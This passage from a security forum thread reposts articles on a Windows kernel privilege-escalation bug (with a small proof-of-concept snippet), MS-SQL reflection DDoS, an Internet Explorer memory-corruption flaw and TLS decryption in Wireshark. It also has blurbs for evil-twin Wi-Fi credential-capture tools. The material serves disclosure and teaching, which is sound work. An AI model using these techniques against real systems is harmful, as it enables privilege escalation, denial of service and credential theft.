privileged operation is allowed to go ahead. This all seems fine, so what’s the issue? While full impersonation is a privileged operation limited to users which havethe impersonate privilege in their token, a normal user without the privilege can impersonate other users for non-security related functions. The kernel differentiates between privileged and unprivileged impersonation by assigning a security level to the token when impersonation is enabled. To understand the vulnerability there’s only two levels of interest, SecurityImpersonation which means the impersonation is privileged and SecurityIdentification which is unprivileged. If the token is assigned SecurityIdentification only operations such as querying for token information, such as the token’s user is allowed. If you try and open a secured resource such as a file the kernel will deny access. This is the underlying vulnerability, if you look at the code the PsReferenceImpersonationToken returns a copy of the security level assigned to the token, however the code fails to verify it’s at SecurityImpersonation level. This means a normal user, who was able to get hold of a Local System access token could impersonate at SecurityIdentification and still pass the check as querying for the user is permitted. Proving Trivial Exploitation Exploiting the bug requires capturing a Local System access token, impersonating it and then calling the system call with appropriate parameters. This must be achievable from normal user privilege otherwise it isn’t a security vulnerability. The system call is undocumented so if we wanted to take a shortcut could we just demonstrate that we can capture the token and leave it at that? Well not really, what this PoC would demonstrate is that something which is documented as possible is indeed possible. Namely that it’s possible from a normal user to capture the token and impersonate it, as the impersonation system is designed this would not cause a security issue. I knew already that COM supports impersonation, that there’s a number of complex system privileged services (for example BITS) we can communicate with as a normal user that we could convince to communicate back to our application in order to perform the impersonation. This wouldn’t demonstrate that we can even reach the vulnerable AhcVerifyAdminContext method in the kernel let alone successfully bypass the check. So starts the long process of reverse engineering to work out how the system call works and what parameters you need to pass to get it to do something useful. There’s some existing work from other researchers (such as this) but certainly nothing concrete to take forward. The system call supports a number of different operations, it turned out that not all the operations needed complex parameters. For example the the AppHelpNotifyStart and AppHelpNotifyStop operations could be easily called, and they relied on the AhcVerifyAdminContext function. I could now produce a PoC which we can verify bypasses the check by observing the system call’s return code. BOOL IsSecurityVulnerability() { ImpersonateLocalSystem(); NTSTATUS status = NtApphelpCacheControl(AppHelpNotifyStop, NULL); return status != STATUS_ACCESS_DENIED; } Is this sufficient to prove exploitability? History has taught me no, for example this issue has almost the exact same sort of operation, namely you can bypass an administrator check through impersonation. In this case I couldn’t produce sufficient evidence that it was exploitable for anything other than information disclosure. So in turn it was not fixed, even though it was effectively a security issue. To give ourselves the best chance of proving exploitability we need to spend more time on this PoC. Improving the Proof-of-Concept In order to improve upon the first PoC I would need to get a better understanding of what the system call is doing. The application compatibility cache is used to store the lookup data from the application compatibility database. This database contains rules which tell the application compatibility system what executables to apply “shims” to in order implement custom behaviours, such as lying about the operating system’s version number to circumvent an incorrect check. The lookup is made every time a process is created, if a suitable matching entry is found it’ll be applied to the new process. The new process will then lookup the shim data it needs to apply from the database. As this occurs every time a new process is created there’s a significant performance impact in going to database file every time. The cache is there to reduce this impact, the database lookup can be added to the cache. If that executable is created later the cached lookup can quickly eliminate the expensive database lookup and either apply a set of shims or not. Therefore we should be able to cache an existing lookup and apply it to an arbitrary executable. So I spent some time working out the format of the parameters to the system call in order to add my own cached lookup. The resulting structure for Windows 8.1 32 bit looked like the following: struct ApphelpCacheControlData { BYTE unk0[0x98]; DWORD query_flags; DWORD cache_flags; HANDLE file_handle; HANDLE process_handle; UNICODE_STRING file_name; UNICODE_STRING package_name; DWORD buf_len; LPVOID buffer; BYTE unkC0[0x2C]; UNICODE_STRING module_name; BYTE unkF4[0x14]; }; You can see there’s an awful lot of unknown parts in the structure. This causes a problem if you were to apply this to Windows 7 (which has a slightly different structure) or 64 bit (which has a different sized structure) but for our purposes it doesn’t matter. We’re not supposed to be writing code to exploit all versions of Windows, all we need to do is prove the security issue to the vendor. As long as you inform the vendor of the PoC limitations (and they pay attention to them) we can do this. The vendor’s still better placed to determine if this PoC proves exploitability across versions of the OS, it’s their product after all. So I could now add an arbitrary cached entry but what can we actually add? I could only add an entry which would have been the result of an existing lookup. You could modify the database to do something like patch running code (the application compatibility system is also used for hotfixes) but that would require administrator privileges. So I needed an existing shim to repurpose. I built a copy of the SDB explorer tool (available from here) so that I could dump the existing database looking for any useful existing shim. I found that for 32 bit there’s a shim which will cause a process to start the executable regsvr32.exe passing the original command line. This tool will load a DLL passed on the command line and execute specific exported methods, if we could control the command line of a privileged process we could redirect it and elevate privileges. This again limits the PoC to only 32 bit processes but that’s fine. The final step, and what caused a lot of confusion was what process to choose to redirect. I could have spent a lot of time investigating other ways of achieving the requirement of starting a process where I control the command line. I already knew one way of doing it, UAC auto elevation. Auto elevation is a feature added to Windows 7 to reduce the number of UAC dialogs a typical user sees. The OS defines a fixed list of allowed auto elevating applications, when UAC is at it’s default setting then requests to elevate these applications do not show a dialog when the user’s an administrator. I can abuse this by applying a cache entry for an existing auto elevating application (in this case I chose ComputerDefaults.exe) and requesting the application runs elevated. This elevated application redirects to regsvr32 passing our fully controlled command line, regsvr32 loads my DLL and we’ve now got code executing with elevated privileges. The PoC didn’t give someone anything they couldn’t already do through various other mechanisms (such as this metasploit module) but it was never meant to. It sufficiently demonstrated the issue by providing an observable result (arbitrary code running as an administrator), from this Microsoft were able to reproduce it and fix it. Final Bit of Fun As there was some confusion on whether this was only a UAC bypass I decided to spend a little time to develop a new PoC which gets local system privileges without any reliance on UAC. Sometimes I enjoy writing exploits, if only to prove that it can be done. To convert the original PoC to one which gets local system privileges I need a different application to redirect. I decided the most likely target was a registered scheduled task as you can sometimes pass arbitrary arguments to the task handler process. So we’ve got three criteria for the ideal task, a normal user must be able to start it, it must result in a process starting as local system and that process must have an arbitrary command line specified by the user. After a bit of searching I found the ideal candidate, the Windows Store Maintenance Task. As we can see if runs as the local system user. We can determine that a normal user can start it by looking at the task file’s DACL using a tool such as icacls. Notice the entry in the following screenshot for NT AUTHORITY\Authenticated Users with Read and Execute (RX) permissions. Finally we can check whether a normal user can pass any arguments to the task by checking the XML task file. In the case of WSTask it uses a custom COM handler, but allows the user to specify two command line arguments. This results in the executable c:\windows\system32\taskhost.exe executing with an arbitrary command line as the local system user. It was just a case of modifying the PoC to add a cache entry for taskhost.exe and start the task with the path to our DLL. This still has a limitation, specifically it only works on 32 bit Windows 8.1 (there’s no 32 bit taskhost.exe on 64 bit platforms to redirect). Still I’m sure it can be made to work on 64 bit with a bit more effort. As the vulnerability is now fixed I’ve made available the new PoC, it’s attached to the original issue here. Conclusions I hope I’ve demonstrated some of the effort a vulnerability researcher would go to in order to ensure a vulnerability will be fixed. It’s ultimately a trade off between the time spent developing the PoC and the chances of the vulnerability being fixed, especially when the vulnerability is complex or non-obvious. In this case I felt I made the right trade-off. Even though the PoC I sent to Microsoft looked, on the surface to only be a UAC bypass combined with the report they were able to determine the true severity and develop the patch. Of course if they’d pushed back and claimed it was not exploitable then I would have developed a more robust PoC. As a further demonstration of the severity I did produce a working exploit which gained local system privileges from a normal user account. Disclosing the PoC exploit is of value to aid in a user’s or security company’s mitigation of a public vulnerability. Without a PoC it’s quite difficult to verify that a security issue has been patched or mitigated. It also helps to inform researchers and developers what types of issues to look out for when developing certain security sensitive applications. Bug hunting is not the sole approach for Project Zero to help secure software, education is just as important. Project Zero’s mission involves tackling software vulnerabilities, and the development of PoCs can be an important part of our duty to help software vendors or open source projects take informed action to fix vulnerabilities. Posted by Chris Evans at 5:27 PM Sursa: http://googleprojectzero.blogspot.co.uk/2015/02/a-tokens-tale_9.html
  13. Attackers Using New MS SQL Reflection Techniques By Bill BrennerFebruary 12, 2015 6:30 AM The bad guys are using a fairly new technique to tamper with the Microsoft SQL Server Resolution Protocol (MC-SQLR) and launch DDoS attacks. In an advisory released this morning, Akamai's Prolexic Security Engineering & Response Team (PLXsert) described it as a new type of reflection-based distributed denial of service (DDoS) attack. PLXsert first spotted attackers using the technique in October. Last month, researcher Kurt Aubuchon studied another such attack and offered an analysis here. PLXsert replicated this attack by creating a script based on Scapy, an open-source packet manipulation tool. Download the full advisory How it works The attack manifests in the form of Microsoft SQL Server responses to a client query or request via abuse of the Microsoft SQL Server Resolution Protocol (MC-SQLR), which listens on UDP port 1434. MC-SQLR lets clients identify the database instance with which they are attempting to communicate when connecting to a database server or cluster with multiple database instances. Each time a client needs to obtain information on configured MS SQL servers on the network, the SQL Resolution Protocol can be used. The server responds to the client with a list of instances. Attackers abuse SQL servers by executing scripted requests and spoofing the source of the query with the IP address of the intended target. Depending on the number of instances present in the abused SQL server, the amplification factor varies. The attack presents a specific payload signature, producing an amplification factor of nearly 25x. In this case, the attacker's request totaled 29 bytes, including IP and UDP headers, and triggered a response of 719 bytes including headers. Some servers may produce a larger or smaller response depending on their configuration. Other tools publicly available on the Internet could reproduce this attack as well. Replicating this attack does not require a high level of technical skill. A scripted attack would only require a list of SQL servers exposed on the Internet that respond to the query. Attackers could use a unicast client request 0x03 or a broadcast request 0x02. Both are requests with a data length of 1 byte that will produce the same type of response from SQL servers. PLXsert identified a tool on GitHub on January 26, 2015, that weaponizes this type of attack for mass abuse. Defensive measures Server hardening procedures should always be applied to servers that are exposed to the Internet. As a general rule, services and protocols that are unnecessary should be disabled or blocked. This attack can only be performed by querying SQL servers with exposed SQL Server Resolution Protocol ports to the Internet. The following best practices can help mitigate this type of DDoS attack. These recommendations are by no means exhaustive and affected organizations should refine and adapt them further based on specific infrastructure and exposed services. Follow Microsoft Technet Security Best Practices to Protect Internet Facing Web Servers. The use of ingress and egress filters applied to SQL server ports at firewalls, routers, or edge devices may prevent this attack. If there is a business case for keeping UDP 1434 open, it should be filtered to only allow trusted IP addresses. Block inbound connections from the Internet, if ports are not needed for external access or administration. SQL Server Resolution Protocol service is not needed in servers that have only one database instance. This has been disabled by default since Microsoft SQL Server 2008. It is not disabled in earlier or desktop engine versions. Disable this service to prevent the abuse of SQL server for this type of attack. If the use of SQL Server Resolution Protocol service is needed, add an additional layer of security before the service is accessed, such as authentication via secure methods (SSH, VPN) or filtering as described above. Sursa: https://blogs.akamai.com/2015/02/plxsert-warns-of-ms-sql-reflection-attacks.html
  14. gosms Your own local SMS gateway What's the use ? Can be used to send SMS, where you don't have access to internet or cannot use Web SMS gateways or want to save some money per SMS, or have minimal requirements for personal / internal use and such deploy in less than 1 minute supports Windows, GNU\Linux, Mac OS works with GSM modems provides API over HTTP to push messages to gateway, just like the internet based gateways do takes care of queuing, throttling and retrying supports multiple devices at once deployment Update conf.ini [DEVICES] section with your modem's COM port. for ex. COM10 or /dev/USBtty2 Run Sursa: https://github.com/haxpax/gosms
  15. INFERNAL-TWIN This is the tool created to automate Evil Twin attack and capturing public and guest credentials of Access Point infernal-twin What this tool will do ? Set up monitoring interface Set up DB Scan wireless network in the range Connect to the network selected SSID Obtain login page of authentication Modify the login page with attacker controlled php script to obtain the credentials Set up Apache Server and serve fake login page Give a victim an IP Set up NAT table Dump the traffic Source && Download Sursa: infernal-twin - This is evil twin attack automated
  16. 3VILTWINATTACKER – ROGUE WI-FI ACCESS POINT This tool create an rogue Wi-Fi access point , purporting to provide wireless Internet services, but snooping on the traffic. 3vilTwinAttacker dependencies: Recommended for 3vilTwinAttacker – Kali linux. Ettercap. Sslstrip. Airbase-ng include in aircrack-ng. DHCP. Ubuntu $ sudo apt-get install isc-dhcp-serverKali linux $ echo "deb Index of /debian wheezy main " >> /etc/apt/sources.list $ apt-get update && apt-get install isc-dhcp-serverFedora $ sudo yum install dhcp 3vilTwinAttacker Options: Etter.dns: Edit etter.dns to loading module dns spoof. Dns Spoof: Start dns spoof attack in interface ath0 fake AP. Ettercap: Start ettercap attack in host connected AP fake Capturing login credentials. Sslstrip: The sslstrip listen the traffic on port 10000. Driftnet: The driftnet sniffs and decodes any JPEG TCP sessions, then displays in an window. Source && Download Sursa: 3vilTwinAttacker - Rogue Wi-Fi Access Point
  17. WAIDPS – WIRELESS AUDITING AND IPS/IDS WAIDPS is an open source wireless swissknife written in Python and work on Linux environment. This is a multipurpose tools designed for audit (penetration testing) networks, detect wireless intrusion (WEP/WPA/WPS attacks) and also intrusion prevention (stopping station from associating to access point). Apart from these, it will harvest all WiFi information in the surrounding and store in databases. This will be useful when it comes to auditing a network if the access point is ‘MAC filtered’ or ‘hidden SSID’ and there isn’t any existing client at that moment. WAIDS may be useful to penetration testers, wireless trainers, law enforcement agencies and those who is interested to know more about wireless auditing and protection. The primarily purpose for this script is to detect intrusion. Once wireless detect is found, it display on screen and also log to file on the attack. Additional features are added to current script where previous WIDS does not have are : automatically save the attack packets into a file interactive mode where users are allow to perform many functions allow user to analyse captured packets load previously saved pcap file or any other pcap file to be examine customizing filters customize detection threshold (sensitivity of IDS in detection) At present, WAIDS is able to detect the following wireless attacks and will subsequently add other detection found in the previous WIDS. Association / Authentication flooding Detect mass deauthentication which may indicate a possible WPA attack for handshake Detect possible WEP attack using the ARP request replay method Detect possible WEP attack using chopchop method Detect possible WPS pin bruteforce attack by Reaver, Bully, etc. Detection of Evil-Twin Detection of Rogue Access Point WAIDPS Requirements No special equipment is required to use this script as long as you have the following : Root access (admin) Wireless interface which is capable of monitoring and injection Python 2.7 installed Aircrack-NG suite installed TShark installed TCPDump installed Mergecap installed (for joining pcap files) xterm installed Documentation <span style="font-family: Rajdhani"><strong> Source && Download Sursa: WAIDPS - Wireless Auditing and IPS/IDS
  18. Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014) Feb 12, 2015 • suto I. Vunerability Description: Uninitialized Memory Corruption Lead to Code Execution. II.Analysis: I crafted an HTML file called 1.html and opened it with IE11/Windows 8.1, the following crash happened: The call tree lead to there : The root cause of problem is wrong assumtion and memory not clearly reset. When execute javascript line: document.getElementsByTagName('tr')[0].insertCell(); The function CTableRowLayout::EnsureCells will be called: Because adding a cell to row, it need to expand the memory to hold new row. First it will reAlloc memory in CimplAry::EnsureSizeWorker to enough for new tableRowLayout. The function success alloc memory as below: But it never reset memory to zero: The line: while ( v2 > v4 ) { --v2; *(_DWORD *)(*(_DWORD *)(v3 + 76) + 4 * v2) = 1; } Will mark if it exist a cell in that row. And the memory at the moment will be likely: 0xheap: 0x1 0x1 0x1 ……. 0xc0c0c0c0 The value 0xc0c0c0c0 is from uninitialized memory. So if we parepare some holes in memory by our string fit with that size, freed before it reallocate our value will be in that location like below ( when our string is 0x40404040 ) That happend because when javascript trying to add a new Row to Table: document.getElementsByTagName(‘table’)[0].insertRow(); But that piece of above memory will never be reset to 1 to indicate that has a cell in there. So after all, IE will trying to access that address,It saw our value as a Pointer to a Table’s Cell Object in Heap. From there it will calculation and Change some memory, with can be lead to Write to controlled memory and highly possible lead to bypass ASLR ( if the address overwrote is Array Lenght ) and Code execution. For full PoC code please email to suto@vnsecurity.net Happy hunting Sursa: Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014)
  19. Decrypting TLS Browser Traffic With Wireshark – The Easy Way! Intro Most IT people are somewhat familiar with Wireshark. It is a traffic analyzer, that helps you learn how networking works, diagnose problems and much more. One of the problems with the way Wireshark works is that it can’t easily analyze encrypted traffic, like TLS. It used to be if you had the private key(s) you could feed them into Wireshark and it would decrypt the traffic on the fly, but it only worked when using RSA for the key exchange mechanism. As people have started to embrace forward secrecy this broke, as having the private key is no longer enough derive the actual session key used to decrypt the data. The other problem with this is that a private key should not or can not leave the client, server, or HSM it is in. This lead me to coming up with very contrived ways of man-in-the-middling myself to decrypt the traffic(e.g. sslstrip). Session Key Logging to the Rescue! Well my friends I’m here to tell you that there is an easier way! It turns out that Firefox and the development version of Chrome both support logging the symmetric session key used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto! decrypted TLS traffic. Read on to learn how to set this up. Setting up our Browsers So if you prefer to use Chrome you must use the Chrome dev channel for this to work, or the default firefox will work too. Next we need to set an environmental variable. On Windows: Go into your computer properties, then click “Advance system settings” then “Environment Variables…” Add a new user variable called “SSLKEYLOGFILE” and point it at the location that you want the log file to be located at. On Linux or Mac OS X: [TABLE=width: 704] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code]$ export SSLKEYLOGFILE=~/path/to/sslkeylog.log[/TD] [/TR] [/TABLE] You can also add this to the last line of your [TABLE=width: 704] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code]~/.bashrc[/TD] [/TR] [/TABLE] on Linux, or [TABLE=width: 704] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code]~/.MacOSX/environment[/TD] [/TR] [/TABLE] on OS X so that it is set every time you log in. The next time that we launch Firefox or the dev channel of Chrome they will log your TLS keys to this file. Setting up Wireshark You need at least Wireshark 1.6 for this to work. We simply go into the preferences of Wireshark Expand the protocols section: Browse to the location of your log file The Results This is more along the lines of what we normally see when look at a TLS packet, This is what it looks like when you switch to the “Decrypted SSL Data” tab. Note that we can now see the request information in plain-text! Success! Conclusion I hope you learned something today, this makes capturing TLS communication so much more straightforward. One of the nice things about this setup is that the client/server machine that generates the TLS traffic doesn’t have to have Wireshark on it, so you don’t have to gum up a clients machine with stuff they won’t need, you can either have them dump the log to a network share or copy it off the machine and reunite it with the machine doing the packet capture later. Thanks for stopping by! References: Mozilla Wiki Imperial Violet Photo Credit: Mike Sursa: https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/
  20. Totusi, ce cauta "black_death_c4t" acolo?
  21. And about 1000$ budget or even more. You must have at least 50 posts in order to buy something.
  22. Da, nasol, incearca sa ii dai parametru de la -1 la 100 in timp ce testezi (Buffering...), sa apelezi la fiecare secunda sa zicem: Timer 1 sec: -> for(i = -1 to 100) { x = sop.GetState(i); writetofile("i = " & i & "state = " & x) Si sa verifici daca se schimb ceva...
  23. Concerns regarding the security of biometric authentication February 2, 2015 Daniel Tomescu More and more gadgets that we use these days (smart phones, smart watches, etc) try to make a personal connection with the owner via his biometric characteristics.Using biometric measures for authentication purposes is a fast growing trend in the IT world, but there are genuine security concerns regarding the maturity level of these methods and their security faults. How safe is it to use biometrics for authentication? Can they be bypassed? Let’s find out! How to find a good biometric characteristic? At this moment, we have 3 main possibilities for verifying a user’s identity: something that the user knows (like a code or a passphrase), something that the user has (a smart card or a token) or something that the user is (a biometric characteristic).For a biometric characteristic to be considered a valid authentication method, it should have the following properties: Universality, meaning that the feature must be present on all individuals; Measurability, meaning that the feature can be measured and the individuals are willing to share it for measurement purposes; High accuracy, meaning that the feature can be measured with an acceptable error rate; Uniqueness, meaning that the feature should be different for every individual; Robustness, meaning that the feature should not vary in time for the same individual; Circumvention, meaning that the feature should not be easily altered, imitated or replicated by third parties. Although the standards might seem too restrictive, there are a big number of biometric characteristics that meet the requirements above (or at least most of them) and can be used in user recognition. Articol complet: Concerns regarding the security of biometric authentication – Security Café
  24. Minim 50 de posturi pentru tranzactii.
×
×
  • Create New...